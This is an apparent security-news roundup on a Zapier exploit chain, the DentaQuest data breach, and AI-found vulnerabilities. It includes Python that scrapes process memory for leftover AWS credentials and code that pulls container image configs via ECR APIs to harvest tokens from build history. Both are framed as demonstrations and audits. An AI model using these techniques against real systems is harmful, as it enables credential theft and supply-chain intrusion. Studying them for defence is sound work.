
Three security stories dropped within a week in late May / early June 2026, and they're worth reading together. Token Security disclosed a five-stage Zapier exploit chain that turned a free account into a JavaScript execution primitive on zapier.com. DentaQuest confirmed a breach of 2.6 million accounts after the ShinyHunters extortion group leaked 234 GB of data. And AI-driven vulnerability discovery crossed another threshold, with Claude Mythos Preview finding thousands of high-severity flaws in widely-deployed open-source code in a single month.
What You Need to Know: On May 28, 2026, Token Security researchers published a writeup of a five-stage Zapier exploit chain, reported on February 12 and paid a $3,000 bounty, that combined a Lambda memory-scraping primitive, an over-permissioned ECR role, an orphaned NPM publish token, and a package that loads in every authenticated zapier.com session. Days later, on June 2, dental benefits administrator DentaQuest (owned by Sun Life) confirmed a ShinyHunters breach exposing 2.6 million accounts (2.6 million unique email addresses, per Have I Been Pwned). In the same week, Anthropic disclosed that Claude Mythos Preview, its unreleased frontier model, had found 10,000+ high-severity vulnerabilities in widely-deployed open-source software in a single month.
Each link in the chain (del os.environ[k] not zeroing heap bytes, the allow_nothing_role that wasn't actually nothing, the NPM token in history[], the zapier-design-system package loading in every authenticated session) is a known anti-pattern. The lesson is that bounty programs need to look at chains, not just primitives.
The full technical writeup is on Help Net Security. The chain ran through five separate systems.
Stage 1: inside Code by Zapier's Python sandbox, which runs on AWS Lambda in us-east-1, a call to os.system('env') showed the environment as it looked after Zapier's handler had scrubbed the AWS credential variables. The scrubber used del os.environ[k], which removes the key from Python's dict and calls unsetenv() in libc; unsetenv() only unlinks the entry from the environ array and does not zero the "NAME=value" bytes on the process heap. The researchers therefore read /proc/self/mem, ran four regex patterns over the readable regions listed in /proc/self/maps, and recovered live STS session tokens for the role assigned to the Lambda.
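To make the Stage 1 primitive concrete, here is an added example (not Token Security's code, and not taken from the Help Net Security writeup) that plants a constructed credential, scrubs it with del os.environ[...] exactly as the page describes, and then scans the process's own memory through /proc/self/maps and /proc/self/mem. The regexes are assumptions, since the page says four patterns were used without printing them, and the self-scan demo only runs on Linux:

```python
"""Stage 1 re-created: del os.environ[...] calls unsetenv(), which unlinks the
variable but leaves its bytes on the heap, so a scan of /proc/self/mem still
finds them.  Added example, not Token Security's tooling.  The regexes are
assumptions (the page says four patterns were used but does not print them);
the planted credential below is a constructed value, not a real key."""
import os
import re
from typing import BinaryIO, Dict, List, Set, Tuple

# setenv() stores "NAME=value" strings, so anchor on the variable name to keep
# false positives down.  ASIA-prefixed key IDs are the STS temporary kind a
# Lambda execution role hands out.
PATTERNS: Dict[str, "re.Pattern[bytes]"] = {
    "access_key_id": re.compile(rb"AWS_ACCESS_KEY_ID=((?:AKIA|ASIA)[A-Z0-9]{16})"),
    "secret_access_key": re.compile(rb"AWS_SECRET_ACCESS_KEY=([A-Za-z0-9/+]{40})"),
    "session_token": re.compile(rb"AWS_SESSION_TOKEN=([A-Za-z0-9/+=]{100,})"),
}
CHUNK = 16 << 20     # read large regions in pieces ...
OVERLAP = 4096       # ... with overlap so a match straddling a boundary is not missed


def parse_maps(maps_text: str) -> List[Tuple[int, int]]:
    """Return (start, end) for each readable, non-special region of a
    /proc/<pid>/maps listing."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2 or not fields[1].startswith("r"):
            continue                      # not mapped readable
        path = fields[5] if len(fields) > 5 else ""
        if path in ("[vvar]", "[vsyscall]"):
            continue                      # reads through /proc/self/mem fail here
        start, end = (int(x, 16) for x in fields[0].split("-"))
        regions.append((start, end))
    return regions


def scan_memory(maps_text: str, mem: BinaryIO,
                patterns: Dict[str, "re.Pattern[bytes]"] = PATTERNS) -> Dict[str, Set[bytes]]:
    """Run every pattern over every readable region of `mem` (a /proc/<pid>/mem
    handle, or any seekable byte stream laid out the way `maps_text` says)."""
    hits: Dict[str, Set[bytes]] = {name: set() for name in patterns}
    for start, end in parse_maps(maps_text):
        pos = start
        while pos < end:
            try:
                mem.seek(pos)
                chunk = mem.read(min(CHUNK, end - pos))
            except (OSError, ValueError, OverflowError):
                break                     # region vanished or is not readable via mem
            if not chunk:
                break
            for name, pat in patterns.items():
                for m in pat.finditer(chunk):
                    hits[name].add(m.group(1))
            if pos + len(chunk) >= end or len(chunk) <= OVERLAP:
                break                     # end of region, or a short read
            pos += len(chunk) - OVERLAP
    return hits


def demo_leak_after_unsetenv() -> Dict[str, Set[bytes]]:
    """Plant a constructed secret, scrub it the way the page describes, then
    scan our own memory.  Linux only; the value below is not a real key."""
    os.environ["AWS_SECRET_ACCESS_KEY"] = "A" * 40
    del os.environ["AWS_SECRET_ACCESS_KEY"]      # dict entry gone, unsetenv() called...
    assert "AWS_SECRET_ACCESS_KEY" not in os.environ
    with open("/proc/self/maps") as maps, open("/proc/self/mem", "rb", buffering=0) as mem:
        return scan_memory(maps.read(), mem)     # ...but the bytes are still on the heap


if __name__ == "__main__":
    for name, values in demo_leak_after_unsetenv().items():
        print(name, len(values), "hit(s)")
```

Run as a script on Linux it reports a secret_access_key hit even though os.environ no longer contains the key: a Python-level scrubber cannot zero libc's copy of the string. The scanner takes its addresses from /proc/self/maps rather than guessing, skips [vvar] and [vsyscall], and reads large regions in overlapping chunks so a string that crosses a chunk boundary is still caught.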
Stage 2: the recovered role was allow_nothing_role, which in fact permitted ecr:DescribeRepositories, ecr:ListImages, ecr:BatchGetImage, and ecr:GetDownloadUrlForLayer. Those four permissions are enough to pull container images through the AWS API alone: BatchGetImage returns the manifest and GetDownloadUrlForLayer returns a presigned URL for each blob, so there is no need for ecr:GetAuthorizationToken or a Docker registry login. The researchers enumerated 1,111 production repositories and pulled images that way.
Stage 3: one image's container config carried an NPM publish token in its history[] field. The token had been passed to the build as a Dockerfile ARG, and the builder serializes ARG values into the created_by entries of history[]. NPM API metadata showed the token had action: write, name: null, and bypass_2fa: true, so it could publish without a second-factor challenge to every package the associated account could publish, including zapier-platform-core, zapier-platform-cli, and zapier-design-system.
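Stages 2 and 3 together, as an added example that is not Token Security's tooling: an audit that needs only the four ECR actions listed above, fetches every tagged image's config blob through BatchGetImage and GetDownloadUrlForLayer (a presigned S3 URL, so no registry login), and flags build ARGs in history[] whose name or value looks like a credential. The secret heuristics, and the duck-typed client that lets the script run against a fake ECR, are assumptions:

```python
"""Stages 2 and 3 as one audit: with nothing but ecr:DescribeRepositories,
ecr:ListImages, ecr:BatchGetImage and ecr:GetDownloadUrlForLayer, fetch each
image's config blob straight from the API (no docker login, no
ecr:GetAuthorizationToken) and scan history[] for build ARGs carrying secrets.
Added example, not Token Security's tooling; the secret heuristics are assumptions."""
import json
import re
import urllib.request
from typing import Any, Callable, Dict, Iterator, List, Tuple

# The legacy builder and BuildKit both record RUN-time ARG values in created_by:
#   "|2 NPM_TOKEN=npm_... NODE_ENV=production /bin/sh -c npm ci"
ARG_LAYER = re.compile(r"^\|\d+ ")
KEY_VALUE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
SUSPICIOUS_NAME = re.compile(r"TOKEN|SECRET|PASS|KEY|CREDENTIAL", re.I)
SUSPICIOUS_VALUE = re.compile(           # npm granular, npm classic (UUID), GitHub PAT
    r"^(npm_[A-Za-z0-9]{36}|[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}|ghp_[A-Za-z0-9]{36})$")


def build_args_from_history(config: Dict[str, Any]) -> List[Tuple[str, str]]:
    """Pull NAME=value pairs out of every ARG-carrying history[] entry.
    Values containing spaces are not handled (the split below is by space)."""
    found: List[Tuple[str, str]] = []
    for entry in config.get("history", []):
        cmd = entry.get("created_by", "")
        if not ARG_LAYER.match(cmd):
            continue
        for token in cmd.split(" ")[1:]:      # everything after "|N"
            m = KEY_VALUE.match(token)
            if not m:
                break                         # first non KEY=value token is the shell command
            found.append((m.group(1), m.group(2)))
    return found


def flag_secrets(args: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    return [(k, v) for k, v in args
            if SUSPICIOUS_NAME.search(k) or SUSPICIOUS_VALUE.match(v)]


def _http_get(url: str) -> bytes:
    with urllib.request.urlopen(url, timeout=30) as resp:   # presigned URL, no auth header
        return resp.read()


def _paginate(call: Callable[..., Dict[str, Any]], key: str,
              **kwargs: Any) -> Iterator[Dict[str, Any]]:
    """Walk a boto3 ECR call that pages with nextToken."""
    token = None
    while True:
        page = call(**kwargs, **({"nextToken": token} if token else {}))
        yield from page.get(key, [])
        token = page.get("nextToken")
        if not token:
            return


def fetch_image_config(client: Any, repo: str, image_id: Dict[str, str],
                       fetch: Callable[[str], bytes] = _http_get) -> Dict[str, Any]:
    """BatchGetImage gives the manifest; GetDownloadUrlForLayer on the config
    digest gives a presigned URL for the config blob.  No registry token involved."""
    resp = client.batch_get_image(repositoryName=repo, imageIds=[image_id])
    manifest = json.loads(resp["images"][0]["imageManifest"])
    if "config" not in manifest:              # manifest list / OCI index
        raise ValueError("multi-platform image: select a platform manifest first")
    url = client.get_download_url_for_layer(
        repositoryName=repo, layerDigest=manifest["config"]["digest"])["downloadUrl"]
    return json.loads(fetch(url))


def audit(client: Any, fetch: Callable[[str], bytes] = _http_get) -> Dict[str, List[Tuple[str, str]]]:
    """Map 'repo:tag' -> flagged build args for every tagged image the role can see."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for repo in _paginate(client.describe_repositories, "repositories"):
        name = repo["repositoryName"]
        for image_id in _paginate(client.list_images, "imageIds",
                                  repositoryName=name, filter={"tagStatus": "TAGGED"}):
            try:
                config = fetch_image_config(client, name, image_id, fetch)
            except Exception:                 # ClientError, manifest list, bad JSON: skip, keep auditing
                continue
            secrets = flag_secrets(build_args_from_history(config))
            if secrets:
                findings[f"{name}:{image_id.get('imageTag')}"] = secrets
    return findings


if __name__ == "__main__":
    import boto3                              # a real run needs credentials for the four actions
    print(json.dumps(audit(boto3.client("ecr", region_name="us-east-1")), indent=2))
```

Pointed at a real account through boto3 it walks every repository the role can describe; the same four actions that carried the attacker to the token are all a defender needs to check whether any image still carries one. Multi-platform images (manifest lists) are skipped and ARG values containing spaces are split, so treat a clean result as a starting point rather than proof.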
Stage 4: zapier-design-system loads in every authenticated session on zapier.com. The researchers verified the load path in the browser's developer tools and stopped there: a poisoned release of the package would have executed attacker-controlled JavaScript inside the authenticated origin as soon as clients picked up the next version.
Stage 5 (the consequence): with JavaScript running in the authenticated origin, an attacker could act as the user inside Zapier, creating Zaps, Tables, and MCP servers and driving the user's existing integrations through the platform; the OAuth tokens for every connected service would have been reachable. Zapier triaged the report within four days of its February 12, 2026 submission, revoked the leaked NPM token, and tightened the underlying AWS role by February 16. The bounty was $3,000, the program maximum, with a "we'll review the cap at the next program review" commitment.
DentaQuest confirmed the breach on June 2, 2026, after ShinyHunters added it to their dark-web leak site. Per Have I Been Pwned's June 3, 2026 entry, the breach was part of a "pay or leak" extortion campaign and the exposed data included "names, contact information, dates of birth, and dental plan information." The Privacy Guides data breach roundup for May 29 – June 4, 2026 puts the count at 2.6 million accounts. The Check Point Research threat intelligence report for June 8, 2026 adds that ShinyHunters claimed 234 GB of data. DentaQuest is owned by Sun Life U.S., and the breach is already drawing class-action interest (GS Legal has opened an investigation).
Anthropic disclosed that Claude Mythos Preview, its unreleased frontier model, found 10,000+ high-severity flaws in widely-deployed open-source software in a single month (per Develeap's coverage and The Hacker News's May 2026 writeup). The 271 Firefox bugs in that count, including the "27-year-old vulnerability" the model surfaced, are the kind of result that changes defender economics: an agent can now read a million lines of code, fuzz every input boundary, and write a CVE-formatted report, and it can do so across many codebases in parallel. The same capability in the wrong hands is the new attack surface.
The Zapier chain is the one to study. Not because Zapier is uniquely broken — every complex SaaS has the same shape of composable primitives — but because the researchers actually stopped at every step, wrote it up, and got a real remediation. The DentaQuest breach is the more painful one: a name, a date of birth, and a dental plan are a lifetime of phishing fodder. And the AI-discovery story is the one that will define the next two years: defender-as-agent versus attacker-as-agent, and the side that builds the better tooling wins.
Token Security disclosed a five-stage Zapier exploit chain (Lambda memory scraping → over-permissioned ECR role → orphaned NPM token → auth-origin JavaScript) that paid $3,000. DentaQuest confirmed a 2.6M-account breach by ShinyHunters (234 GB leaked). Claude Mythos Preview disclosed 10,000+ AI-found high-severity open-source vulnerabilities in a month.
Source: TLDR | mr.technology — The Master Skill Index